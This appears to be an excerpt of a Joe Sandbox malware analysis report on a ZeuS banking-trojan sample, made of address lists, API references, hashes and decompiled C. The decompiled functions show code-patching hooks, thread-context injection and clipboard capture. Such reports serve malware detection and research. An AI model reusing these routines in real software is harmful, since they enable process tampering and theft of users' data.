0x0040b0e6
0x0040b146
0x0040b14f
0x0040b154
0x0040b156
0x00000000
0x0040b15c
0x0040b15e
0x0040b164
0x0040b166
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b166
0x0040b0e8
0x0040b0eb
0x0040b0f7
0x0040b0fa
0x0040b0fd
0x0040b0ff
0x0040b102
0x0040b105
0x0040b144
0x0040b144
0x0040b144
0x00000000
0x0040b107
0x0040b107
0x0040b10e
0x0040b10e
0x0040b113
0x00000000
0x0040b115
0x0040b11b
0x0040b120
0x0040b122
0x00000000
0x0040b124
0x0040b132
0x0040b135
0x0040b138
0x0040b13e
0x0040b140
0x0040b0d7
0x0040b0d7
0x00000000
0x0040b142
0x00000000
0x0040b142
0x0040b140
0x0040b122
0x0040b109
0x0040b109
0x0040b10c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b10c
0x0040b107
0x0040b105
0x00000000
0x0040b0e6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b0c5
0x0040b0a4
0x0040b0a0
0x0040b182
0x0040b188

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000004,00000080,00000000,00000000,00000000), ref: 0040B07C

Part of subcall function 0040A521: GetFileSizeEx.KERNEL32(0040B093,0040B093,?,?,?,0040B093,00000000), ref: 0040A52D

ReadFile.KERNEL32(?,?,00000005,00000000,00000000,00000000), ref: 0040B0BD
CloseHandle.KERNEL32(?,00000000), ref: 0040B0C9
ReadFile.KERNEL32(?,?,00000005,00000005,00000000,?,?,00000000,00000001), ref: 0040B138
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 0040B15E

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: File$Read$CloseCreateHandleSize
String ID:
API String ID: 1850650832-0
Opcode ID: 901a29252d7b615c56e12bc8e3871c776818d5c8f42324924f18d6cbc1905012
Instruction ID: 667bed3640bea25cbad98fba60ae2e937129b5823efb42a2a44c610ee3c67668
Opcode Fuzzy Hash: 901a29252d7b615c56e12bc8e3871c776818d5c8f42324924f18d6cbc1905012
Instruction Fuzzy Hash: D541A230900209AEDB218F65CC45BAFBBB9FF89754F10423AF5A1B62E0D7794941CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00409A29, Relevance: 7.6, APIs: 5, Instructions: 108
injectionCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00409A29(void* __eax, intOrPtr __ecx, void* __edx, void* __eflags, void* _a4, void* _a8) {
				long _v8;
				DWORD* _v12;
				intOrPtr _v47;
				void _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t47;
				void* _t58;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				intOrPtr* _t66;
				long _t68;
				DWORD* _t69;
				void* _t71;

				_t63 = __edx;
				_t61 = __ecx;
				_t58 = __eax;
				_t69 = 0;
				_v12 = 0;
				if(E004099E4(_a4) < 0x1e || VirtualProtectEx(0xffffffff, _a4, 0x1e, 0x40,  &_v8) == 0) {
					L18:
					return _v12;
				} else {
					E00405299( &_v48,  &_v48, 0xffffff90, 0x23);
					if(ReadProcessMemory(0xffffffff, _a4,  &_v48, 0x1e, 0) == 0) {
						L17:
						VirtualProtectEx(0xffffffff, _a4, 0x1e, _v8,  &_v8);
						goto L18;
					} else {
						_t66 =  &_v48;
						_push(0);
						_push(_t66);
						while(1) {
							_t47 = E0041D860(_t58, _t61, _t63, _t66, _t69);
							if(_t47 == 0xffffffff) {
								break;
							}
							_t69 = _t69 + _t47;
							if(_t69 > 0x1e) {
								L16:
								goto L17;
							}
							_t61 =  *_t66;
							if(_t61 == 0xe9 || _t61 == 0xe8) {
								if(_t47 == 5) {
									 *((intOrPtr*)(_t66 + 1)) =  *((intOrPtr*)(_t66 + 1)) + _a4 - _a8;
								}
							}
							_push(0);
							if(_t69 >= 5) {
								_t17 = _t69 + 5; // 0x5
								_t68 = _t17;
								 *((intOrPtr*)(_t71 + _t69 - 0x2b)) = _a4 - _a8 - 5;
								 *((char*)(_t71 + _t69 - 0x2c)) = 0xe9;
								if(WriteProcessMemory(0xffffffff, _a8,  &_v48, _t68, ??) != 0) {
									_t62 = _a4;
									_v48 = 0xe9;
									_v47 = _t58 - _t62 - 5;
									E0040DF7C(_t62, _a8);
									if(WriteProcessMemory(0xffffffff, _t62,  &_v48, 5, 0) != 0) {
										_v12 = _t68;
									}
								}
								goto L16;
							}
							_t66 = _t71 + _t69 - 0x2c;
							_push(_t66);
						}
						goto L16;
					}
				}
			}

0x00409a29
0x00409a29
0x00409a31
0x00409a36
0x00409a38
0x00409a43
0x00409b3d
0x00409b43
0x00409a64
0x00409a6c
0x00409a85
0x00409b29
0x00409b37
0x00000000
0x00409a8b
0x00409a8c
0x00409a8f
0x00409a92
0x00409ac6
0x00409ac6
0x00409ace
0x00000000
0x00000000
0x00409a95
0x00409a9a
0x00409b28
0x00000000
0x00409b28
0x00409aa0
0x00409aa5
0x00409aaf
0x00409ab7
0x00409ab7
0x00409aaf
0x00409aba
0x00409abf
0x00409ad8
0x00409ad8
0x00409ade
0x00409aea
0x00409afb
0x00409afd
0x00409b08
0x00409b0c
0x00409b0f
0x00409b23
0x00409b25
0x00409b25
0x00409b23
0x00000000
0x00409afb
0x00409ac1
0x00409ac5
0x00409ac5
0x00000000
0x00409ad0
0x00409a85

APIs

Part of subcall function 004099E4: VirtualQueryEx.KERNEL32(000000FF,?,?,0000001C,00000008,?,?,?,?,0040DF1C,00000000,00000000,00000034,0040E2A7,00422008,00000000), ref: 004099F9

VirtualProtectEx.KERNEL32(000000FF,00000000,0000001E,00000040,0041C534,-00000008,00000034,?,?,0040E03D,?,00000000,?,?,0040E2A7,00422008), ref: 00409A56
ReadProcessMemory.KERNEL32(000000FF,00000000,?,0000001E,00000000,?,00000090,00000023,?,?,0040E03D,?,00000000,?,?,0040E2A7), ref: 00409A7D
WriteProcessMemory.KERNEL32(000000FF,00422008,?,00000005,00000000,?,00000000,00000000), ref: 00409AF7
WriteProcessMemory.KERNEL32(000000FF,?,000000E9,00000005,00000000), ref: 00409B1F
VirtualProtectEx.KERNEL32(000000FF,00000000,0000001E,0041C534,0041C534,?,?,0040E03D,?,00000000,?,?,0040E2A7,00422008,00000000,0041C534), ref: 00409B37

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: MemoryProcessVirtual$ProtectWrite$QueryRead
String ID:
API String ID: 390532180-0
Opcode ID: ff75bdb5e7507d29aa2b2dcc0ad68a4f533d712be149fe653230d26d7b9f7bac
Instruction ID: 523b0568fd045a6afa61fc32e92698a4c0be3dc787cb8e781cf0af3ca0cb0023
Opcode Fuzzy Hash: ff75bdb5e7507d29aa2b2dcc0ad68a4f533d712be149fe653230d26d7b9f7bac
Instruction Fuzzy Hash: 52317372900249AADF109EB9DC44EDE7B78EB49330F108726F935B62D1C774E940CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00416401, Relevance: 7.6, APIs: 5, Instructions: 94
networkCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00416401(intOrPtr* __edi, void* __eflags, intOrPtr _a4, void* _a8, intOrPtr* _a12) {
				intOrPtr _v28;
				signed int _v44;
				char _v52;
				intOrPtr _v56;
				char _v61;
				intOrPtr _v64;
				signed int _v72;
				intOrPtr _v76;
				char _v77;
				intOrPtr _v84;
				intOrPtr _v85;
				char _v89;
				void* __esi;
				char _t31;
				intOrPtr _t32;
				char* _t37;
				intOrPtr _t44;
				intOrPtr* _t58;
				intOrPtr _t62;
				intOrPtr* _t63;
				intOrPtr _t65;

				_t63 = __edi;
				ResetEvent(_a8);
				_t31 = E004051B6(0x1000);
				_t65 = 0;
				_v52 = _t31;
				if(_t31 != 0) {
					_t58 = __imp__InternetSetStatusCallbackW;
					_t32 =  *_t58(_a4, E004163B8);
					_t62 = 0x28;
					_v56 = _t32;
					 *_a12 = 0;
					 *__edi = 0;
					_v61 = 1;
					E00405299( &_v52,  &_v52, 0, _t62);
					_v64 = _t62;
					_v44 = _v72;
					while(1) {
						L3:
						_t37 =  &_v52;
						_v28 = 0x1000;
						__imp__InternetReadFileExA(_a4, _t37, 8, _t65);
						if(_t37 == 0) {
							break;
						}
						if(_v44 != _t65) {
							_t67 = _a12;
							if(E00405171( *_t63 + _v44, _a12) == 0) {
								L9:
								_v77 = 0;
							} else {
								E00405222( *_t67 +  *_t63, _v76, _v44);
								 *_t63 =  *_t63 + _v56;
								_t65 = 0;
								continue;
							}
						}
						L10:
						asm("sbb eax, eax");
						 *_t58(_a4,  ~(_v72 + 1) & _v72);
						E004051E6(_v84);
						if(_v89 == 0) {
							E004051E6( *_a12);
						}
						_t44 = _v85;
						goto L13;
					}
					if(GetLastError() != 0x3e5) {
						goto L9;
					} else {
						E00408953( &_a8);
						goto L3;
					}
					goto L10;
				} else {
					E004051E6(0);
					_t44 = 0;
				}
				L13:
				return _t44;
			}

0x00416401
0x0041640f
0x0041641a
0x0041641f
0x00416421
0x00416427
0x00416436
0x00416444
0x00416448
0x00416449
0x00416451
0x00416459
0x0041645b
0x00416460
0x00416469
0x0041646d
0x00416471
0x00416471
0x00416474
0x0041647c
0x00416484
0x0041648c
0x00000000
0x00000000
0x004164aa
0x004164b2
0x004164bc
0x004164dc
0x004164dc
0x004164be
0x004164cd
0x004164d6
0x004164d8
0x00000000
0x004164d8
0x004164bc
0x004164e1
0x004164e8
0x004164f2
0x004164f8
0x00416502
0x00416509
0x00416509
0x0041650e
0x00000000
0x0041650e
0x00416499
0x00000000
0x0041649b
0x0041649f
0x00000000
0x0041649f
0x00000000
0x00416429
0x0041642a
0x0041642f
0x0041642f
0x00416512
0x00416517

APIs

ResetEvent.KERNEL32(?), ref: 0041640F
InternetSetStatusCallbackW.WININET(?,004163B8), ref: 00416444
InternetReadFileExA.WININET ref: 00416484
GetLastError.KERNEL32 ref: 0041648E
InternetSetStatusCallbackW.WININET(?,?), ref: 004164F2

Part of subcall function 004051E6: HeapFree.KERNEL32(00000000,00000000,004069DD,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051F9

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Internet$CallbackStatus$ErrorEventFileFreeHeapLastReadReset
String ID:
API String ID: 4044253124-0
Opcode ID: 7297b6bb6205c2923436f1a44e87f5d49b264f9d02b43835057764d291772a86
Instruction ID: a53a8d65e28ab0013b9b6ab4cf1bd99294cc5ab7d5aeb81b3148993dee1bb72a
Opcode Fuzzy Hash: 7297b6bb6205c2923436f1a44e87f5d49b264f9d02b43835057764d291772a86
Instruction Fuzzy Hash: 38319C71508355AFCB11DF64DC80AAFBBE8FF58344F00482AF884972A1D738C954CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040F667, Relevance: 7.6, APIs: 5, Instructions: 85
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F667(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				long _v12;
				void* _v16;
				char _v32;
				void _v360;
				short _v880;
				void* __edi;
				void* __esi;
				void* _t18;
				void* _t25;
				void* _t26;
				long _t39;
				void* _t42;
				void* _t44;
				long _t47;

				_t48 =  &_v32;
				_t18 = 0x2b;
				_v16 = __edx;
				_t44 = __ecx;
				E0040F34A(_t18,  &_v32);
				if(E0040AA77(_t48,  &_v880, _t44) == 0) {
					L11:
					return 1;
				}
				_t25 = CreateFileW( &_v880, 0x40000000, 1, 0, 2, 0x80, 0);
				_v8 = _t25;
				if(_t25 == 0xffffffff) {
					goto L11;
				}
				_t26 = 0x30;
				_t39 = 0;
				E0040F314(_t26,  &_v360);
				if(WriteFile(_v8,  &_v360, 0x146,  &_v12, 0) == 0 || _v12 != 0x146) {
					L9:
					FlushFileBuffers(_v8);
					CloseHandle(_v8);
					if(_t39 == 0) {
						E0040A548( &_v880);
					}
					goto L11;
				} else {
					_t42 = _v16;
					if(_t42 == 0) {
						L7:
						_t39 = 1;
						goto L9;
					}
					_t47 = E00405D23(_t42);
					if(WriteFile(_v8, _t42, _t47,  &_v12, 0) == 0 || _v12 != _t47) {
						_t39 = 0;
						goto L9;
					} else {
						goto L7;
					}
				}
			}

0x0040f674
0x0040f677
0x0040f678
0x0040f67b
0x0040f67d
0x0040f693
0x0040f749
0x0040f74d
0x0040f74d
0x0040f6b2
0x0040f6b8
0x0040f6be
0x00000000
0x00000000
0x0040f6cd
0x0040f6ce
0x0040f6d0
0x0040f6f4
0x0040f725
0x0040f728
0x0040f731
0x0040f73a
0x0040f743
0x0040f743
0x00000000
0x0040f6fb
0x0040f6fb
0x0040f700
0x0040f71f
0x0040f71f
0x00000000
0x0040f71f
0x0040f709
0x0040f718
0x0040f723
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f718

APIs

Part of subcall function 0040AA77: PathCombineW.SHLWAPI(0041C3C7,0041C3C7,?,0041C3C7,?,?), ref: 0040AA96

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,?,00000000), ref: 0040F6B2
WriteFile.KERNEL32(0040F64F,?,00000146,?,00000000,00000000), ref: 0040F6F0
WriteFile.KERNEL32(0040F64F,?,00000000,?,00000000), ref: 0040F714
FlushFileBuffers.KERNEL32(0040F64F), ref: 0040F728
CloseHandle.KERNEL32(0040F64F), ref: 0040F731

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: File$Write$BuffersCloseCombineCreateFlushHandlePath
String ID:
API String ID: 2459967240-0
Opcode ID: 6bfe1de16d46025d465ddb17f7b6ce1da780e585d12c9166e5d653d7ad6027af
Instruction ID: a46e1b76bde762fec91a0b1f305db3532b72d5f95ac4f133f999f281dca87973
Opcode Fuzzy Hash: 6bfe1de16d46025d465ddb17f7b6ce1da780e585d12c9166e5d653d7ad6027af
Instruction Fuzzy Hash: 47217832940218BADF209BA19C45FEF7BBCAB45754F1040B6A500B32E0D739AA49CA66

Uniqueness

Uniqueness Score: -1.00%

Function 00418A3C, Relevance: 7.6, APIs: 5, Instructions: 83
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00418A3C(void* __edx, void** _a4, void** _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32, intOrPtr _a36, intOrPtr _a40, void* _a44) {
				struct _CONTEXT _v720;
				void* __edi;
				void* __esi;
				intOrPtr _t32;
				void* _t36;
				void* _t37;
				void** _t45;
				void* _t46;
				void* _t47;
				void** _t50;
				void* _t52;
				void* _t53;
				signed int _t55;

				_t47 = __edx;
				_t45 = _a4;
				_t32 =  *0x4239d4(_t45, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44);
				_a40 = _t32;
				if(_t32 >= 0 && (_a32 & 0x00000001) != 0 && _t45 != 0 && _a8 != 0 && E0041CAA4() != 0 && GetProcessId( *_t45) != 0) {
					_t36 = E0041C8D5(_t46, _t47, _t35);
					_a44 = _t36;
					_t63 = _t36;
					if(_t36 != 0) {
						_push(_t52);
						_t37 = E0041C9B9(_t46,  *_t45, _t52, _t63, _t36, 0);
						_t50 = _a8;
						_t53 = _t37;
						_a32 = _t53;
						_t55 = _t53 -  *0x4239c4 + E0041D12E;
						_v720.ContextFlags = 0x10003;
						if(GetThreadContext( *_t50,  &_v720) == 0 || _v720.Eip !=  *0x4239dc) {
							L12:
							VirtualFreeEx( *_t45, _a32, 0, 0x8000);
						} else {
							if(( *0x4239b0 & 0x00000010) != 0) {
								_t55 = _t55 ^ _v720.Eax;
							}
							_v720.Eax = _t55;
							_v720.ContextFlags = 0x10002;
							if(SetThreadContext( *_t50,  &_v720) == 0) {
								goto L12;
							}
						}
						CloseHandle(_a44);
					}
				}
				return _a40;
			}

0x00418a3c
0x00418a49
0x00418a68
0x00418a6e
0x00418a73
0x00418ab3
0x00418ab8
0x00418abb
0x00418abd
0x00418ac3
0x00418aca
0x00418acf
0x00418ad2
0x00418ada
0x00418ae6
0x00418aec
0x00418afe
0x00418b40
0x00418b4c
0x00418b0e
0x00418b15
0x00418b17
0x00418b17
0x00418b26
0x00418b2c
0x00418b3e
0x00000000
0x00000000
0x00418b3e
0x00418b55
0x00418b5c
0x00418abd
0x00418b62

APIs

Part of subcall function 0041CAA4: WaitForSingleObject.KERNEL32(00000000,0041BE2C,?,19367402,00000001), ref: 0041CAAC

GetProcessId.KERNEL32(?), ref: 00418AA4

Part of subcall function 0041C8D5: CreateMutexW.KERNEL32(004239E8,00000001,?,00423C28,74B5F560,?,00000002,?,74B5F560), ref: 0041C91D
Part of subcall function 0041C8D5: GetLastError.KERNEL32 ref: 0041C929
Part of subcall function 0041C8D5: CloseHandle.KERNEL32(00000000), ref: 0041C937

GetThreadContext.KERNEL32(00000000,?,00000000,00000000,?,?,00000000), ref: 00418AF6
SetThreadContext.KERNEL32(00000000,00010003,?,?,00000000), ref: 00418B36
VirtualFreeEx.KERNEL32(?,00000001,00000000,00008000,?,?,00000000), ref: 00418B4C
CloseHandle.KERNEL32(?,?,?,00000000), ref: 00418B55

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: CloseContextHandleThread$CreateErrorFreeLastMutexObjectProcessSingleVirtualWait
String ID:
API String ID: 3998962940-0
Opcode ID: 596ec76e7ab6cbce03bf29b419d8869d22d907a1ba24083a6647a35471b404e6
Instruction ID: 75ac589b2be65b7c67d57d45d8e7c3e659a1941366ab9da7b7a24346731a83fa
Opcode Fuzzy Hash: 596ec76e7ab6cbce03bf29b419d8869d22d907a1ba24083a6647a35471b404e6
Instruction Fuzzy Hash: B8319EB150110DABDF129F64CC48FDA7BB9BF09344F04416AFE08A6260CB79E891CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00417BC7, Relevance: 7.6, APIs: 5, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417BC7(struct HWND__* __ecx, intOrPtr* __edx) {
				struct tagRECT _v24;
				char _v28;
				struct HWND__* _v32;
				intOrPtr _v36;
				struct HWND__* _v40;
				void* __edi;
				intOrPtr _t29;
				signed int _t30;
				RECT* _t52;
				signed int _t54;
				intOrPtr* _t61;

				_t55 = __edx;
				_t61 = __edx;
				 *( *(__edx + 0x14)) = 0x3c;
				_v32 = __ecx;
				if(GetWindowInfo(__ecx,  *(__edx + 0x14)) == 0) {
					L12:
					return 1;
				}
				_t29 =  *((intOrPtr*)(_t61 + 0x14));
				_t54 =  *(_t29 + 0x24);
				if((_t54 & 0x40000000) == 0) {
					_t52 =  *_t61 + 0x24;
				} else {
					_t52 = _t61 + 4;
				}
				if((_t54 & 0x10000000) == 0) {
					_t30 = 0;
					goto L9;
				} else {
					if((IntersectRect( &_v24, _t29 + 0x14, _t52) & 0xffffff00 | _t40 != 0x00000000) != 0) {
						L10:
						E00417A56( *_t61, _t54, _t55, _t52, _v32,  *((intOrPtr*)(_t61 + 0x14)));
						_v36 =  *_t61;
						_v24.right =  *((intOrPtr*)(_t61 + 0x14));
						if(GetTopWindow(_v40) != 0) {
							E004098F3( &_v28, _t35);
						}
						goto L12;
					}
					if(IsRectEmpty( *((intOrPtr*)(_t61 + 0x14)) + 0x14) == 0) {
						goto L12;
					}
					_t30 = IntersectRect( &_v24,  *((intOrPtr*)(_t61 + 0x14)) + 4, _t52) & 0xffffff00 | _t48 != 0x00000000;
					L9:
					if(_t30 == 0) {
						goto L12;
					}
					goto L10;
				}
			}

0x00417bc7
0x00417bd2
0x00417bd8
0x00417be1
0x00417bee
0x00417c92
0x00417c9a
0x00417c9a
0x00417bf4
0x00417bf7
0x00417c00
0x00417c09
0x00417c02
0x00417c02
0x00417c02
0x00417c12
0x00417c56
0x00000000
0x00417c14
0x00417c2d
0x00417c5c
0x00417c67
0x00417c72
0x00417c79
0x00417c85
0x00417c8d
0x00417c8d
0x00000000
0x00417c85
0x00417c3e
0x00000000
0x00000000
0x00417c51
0x00417c58
0x00417c5a
0x00000000
0x00000000
0x00000000
0x00417c5a

APIs

GetWindowInfo.USER32 ref: 00417BE6
IntersectRect.USER32 ref: 00417C24
IsRectEmpty.USER32(?), ref: 00417C36
IntersectRect.USER32 ref: 00417C4D
GetTopWindow.USER32(?), ref: 00417C7D

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Rect$IntersectWindow$EmptyInfo
String ID:
API String ID: 1664082778-0
Opcode ID: 59e13ce2af431b91e38bf855e7a2de9b026d555c6a289651b2b2d702a0a7e40c
Instruction ID: 6a82ab9d6d0487970fa7768a63ddd320dd102ad984f593d2e39cceeb4cf4f801
Opcode Fuzzy Hash: 59e13ce2af431b91e38bf855e7a2de9b026d555c6a289651b2b2d702a0a7e40c
Instruction Fuzzy Hash: C121A1711083019BD720DF68ED80E97B3FCAF44754B044A2AF885D3352EB39E9458BB5

Uniqueness

Uniqueness Score: -1.00%

Function 0041BDC2, Relevance: 7.6, APIs: 5, Instructions: 72
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0041BDC2(void* __ecx, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v104;
				char _v204;
				char _v724;
				void* __edi;
				intOrPtr _t18;
				void* _t26;
				void* _t40;
				WCHAR* _t43;

				_t40 = __ecx;
				SetThreadPriority(GetCurrentThread(), 0);
				_t18 = E0041C97E(_t40, 0x19367402, 1);
				_v12 = _t18;
				if(_t18 != 0) {
					E0041C946(0xff220829,  &_v204, 0);
					_t43 =  &_v724;
					E0041CC9C(_t40, _t43, __esi, 1);
					PathQuoteSpacesW(_t43);
					_t41 = _t43;
					_v8 = E00405D35(_t43);
					if(E0041CAA4() == 0) {
						L7:
						E004089B9(_v12);
						return 0;
					}
					_push(__esi);
					_t26 = 3;
					E0040F34A(_t26,  &_v104);
					if(WaitForSingleObject( *0x423e74, 0xc8) != 0x102) {
						L6:
						goto L7;
					}
					_v8 = _v8 + _v8 + 2;
					do {
						E00409465(_t41,  &_v104,  &_v204, 1,  &_v724, _v8);
					} while (WaitForSingleObject( *0x423e74, 0xc8) == 0x102);
					goto L6;
				}
				return _t18 + 1;
			}

0x0041bdc2
0x0041bdd4
0x0041bde1
0x0041bde6
0x0041bdeb
0x0041be02
0x0041be09
0x0041be0f
0x0041be17
0x0041be1d
0x0041be24
0x0041be2e
0x0041be8d
0x0041be90
0x00000000
0x0041be97
0x0041be31
0x0041be37
0x0041be38
0x0041be56
0x0041be8b
0x00000000
0x0041be8c
0x0041be5f
0x0041be62
0x0041be79
0x0041be87
0x00000000
0x0041be62
0x00000000

APIs

GetCurrentThread.KERNEL32 ref: 0041BDCD
SetThreadPriority.KERNEL32(00000000), ref: 0041BDD4

Part of subcall function 0041C97E: CreateMutexW.KERNEL32(004239E8,00000000,?,?,?,?,?), ref: 0041C99F

PathQuoteSpacesW.SHLWAPI(?,00000001,FF220829,?,00000000,?,19367402,00000001), ref: 0041BE17
WaitForSingleObject.KERNEL32(000000C8,?,?,?,19367402,00000001), ref: 0041BE4F
WaitForSingleObject.KERNEL32(000000C8,?,?,00000001,?,?,?,?,?,19367402,00000001), ref: 0041BE85

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: ObjectSingleThreadWait$CreateCurrentMutexPathPriorityQuoteSpaces
String ID:
API String ID: 123286213-0
Opcode ID: 2347e79e45b425e8c25c72bce26361ef6fc96e2928527663b062d178beaf456e
Instruction ID: 141df8375462e81b798ba4ccc292f5c90ab283ad61c8b985a3fdf18497251b34
Opcode Fuzzy Hash: 2347e79e45b425e8c25c72bce26361ef6fc96e2928527663b062d178beaf456e
Instruction Fuzzy Hash: 8F219F71A40208AEDF11EBA09D85FEE7779EB04344F10446AF604F71A1DA789E858B98

Uniqueness

Uniqueness Score: -1.00%

Function 00404EB7, Relevance: 7.6, APIs: 5, Instructions: 70
clipboardCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00404EB7(void* __edx, void* _a4) {
				void* __ebx;
				signed int _t11;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				int _t25;

				_t22 = __edx;
				_t25 = _a4;
				_t23 = GetClipboardData(_t25);
				_a4 = _t23;
				if(E0041CAA4() == 0) {
					return _t23;
				}
				if(_t23 == 0 || _t25 != 1 && _t25 != 0xd && _t25 != 7) {
					L20:
					return _a4;
				} else {
					_t20 = GlobalLock(_t23);
					if(_t20 == 0) {
						L19:
						goto L20;
					}
					_t11 = _t25 - 1;
					if(_t11 == 0) {
						_push(_t20);
						_push(0);
						L12:
						_t24 = E00405426(_t11 | 0xffffffff);
						L15:
						if(_t24 != 0) {
							EnterCriticalSection(0x4223b8);
							E00404BB4(E00404BB4(_t13, _t20, _t22, 0x4015f4), _t20, _t22, _t24);
							LeaveCriticalSection(0x4223b8);
							if(_t24 != _t20) {
								E004051E6(_t24);
							}
						}
						GlobalUnlock(_a4);
						goto L19;
					}
					_t11 = _t11 - 6;
					if(_t11 == 0) {
						_push(_t20);
						_push(1);
						goto L12;
					}
					_t13 = _t11 != 6;
					if(_t11 != 6) {
						_t24 = _a4;
					} else {
						_t24 = _t20;
					}
					goto L15;
				}
			}

0x00404eb7
0x00404ebb
0x00404ec6
0x00404ec8
0x00404ed2
0x00000000
0x00404ed4
0x00404edd
0x00404f65
0x00000000
0x00404ef2
0x00404efa
0x00404efe
0x00404f64
0x00000000
0x00404f64
0x00404f02
0x00404f03
0x00404f22
0x00404f23
0x00404f16
0x00404f1e
0x00404f2a
0x00404f2c
0x00404f34
0x00404f45
0x00404f4b
0x00404f53
0x00404f56
0x00404f56
0x00404f53
0x00404f5e
0x00000000
0x00404f5e
0x00404f05
0x00404f08
0x00404f13
0x00404f14
0x00000000
0x00404f14
0x00404f0a
0x00404f0d
0x00404f27
0x00404f0f
0x00404f0f
0x00404f0f
0x00000000
0x00404f0d

APIs

GetClipboardData.USER32 ref: 00404EC0

Part of subcall function 0041CAA4: WaitForSingleObject.KERNEL32(00000000,0041BE2C,?,19367402,00000001), ref: 0041CAAC

GlobalLock.KERNEL32 ref: 00404EF4
EnterCriticalSection.KERNEL32(004223B8,00000000,00000000), ref: 00404F34
LeaveCriticalSection.KERNEL32(004223B8,00000000,004015F4), ref: 00404F4B
GlobalUnlock.KERNEL32(?,00000000,00000000), ref: 00404F5E

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: CriticalGlobalSection$ClipboardDataEnterLeaveLockObjectSingleUnlockWait
String ID:
API String ID: 1109978993-0
Opcode ID: 6d8c9342c154edf4a2fd15d172b468659fcad3ba5e91eec83aeb719533e99738
